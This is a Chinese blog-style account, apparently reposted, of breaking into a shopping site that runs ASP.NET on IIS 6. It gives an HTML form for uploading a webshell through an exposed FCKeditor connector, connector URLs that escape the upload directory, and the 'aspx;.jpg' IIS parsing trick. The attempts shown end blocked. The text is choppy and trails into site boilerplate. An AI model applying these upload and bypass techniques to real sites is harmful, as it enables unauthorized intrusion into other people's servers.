原先是 简单 看了看!。。。网站 程序是 asp.net web服务是 iis 6...
休息一会 群里 吼 2句。。。
扫描过程 很慢 于是 莪 等得不耐烦了!。。。
拿起 啊D 去扫描。。。(PS:不行啊。。。貌似 木有 注入。。。)
无奈 无奈啊。。。就 仔细 的看站 看啊 看啊 看。。。突然 发现 图片 连接 有问题。。。
因为 图片名字不是自动命名的,而去 图片是连接是在子域名下。。。结果 经验丰富我。。。
manager.XXX测试数据 知道 是后台登陆地址!
没注入 没密码啊。。。怎么办啊? 就顺手的 ewebediter 404 fckeditor 提示 403错误
哈哈。。。有戏了! 于是就。。。
上传 我们的脚步木马咯。。。
<form id="frmUpload" enctype="multipart/form-data"
action="
Type=Media" method="post"> Upload a new file: HdhCmsTest2cto测试数据 <br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form>
上传成功。。。可是 事实并非想得那样简单。。。当我打开马的时候。。。出现了!
该页无法显示
您试图从目录中执行 CGI、ISAPI 或其他可执行程序,但该目录不允许执行程序。 --------------------------------------------------------------------------------
请尝试以下操作:
如果您认为该目录应该允许执行访问权限,请与网站管理员联系。 HTTP 错误 403.1 - 禁止访问:执行访问被拒绝。 Internet 信息服务 (IIS)
哎 没办法。。。无奈 无奈。。。于是 就到渗透了!
打开
manage.xxxx测试数据/FCKeditor/editor/filemanager/browser/default/browser.html?
type=Image&connector=connectors/aspx/connector.aspx
图3
可以正常显示。。。这回有戏了。。。
继续 跳过 突破目录。。。
FCKeditor/editor/filemanager/browser/default/browser.html?type=&connector=connectors/aspx/connector.aspx
然后跳转到 inc 目录里。。。
然后就是传马咯 ,上传成功了,但是 服务器 不允许 执行 asp 程序。。。
改成 aspx;.jpg 同样不允许访问
Internet Explorer 无法显示该网页 摘自 The Blog of Penker查看更多关于对某商城的一次入侵检测 - 网站安全 - 自学php的详细内容...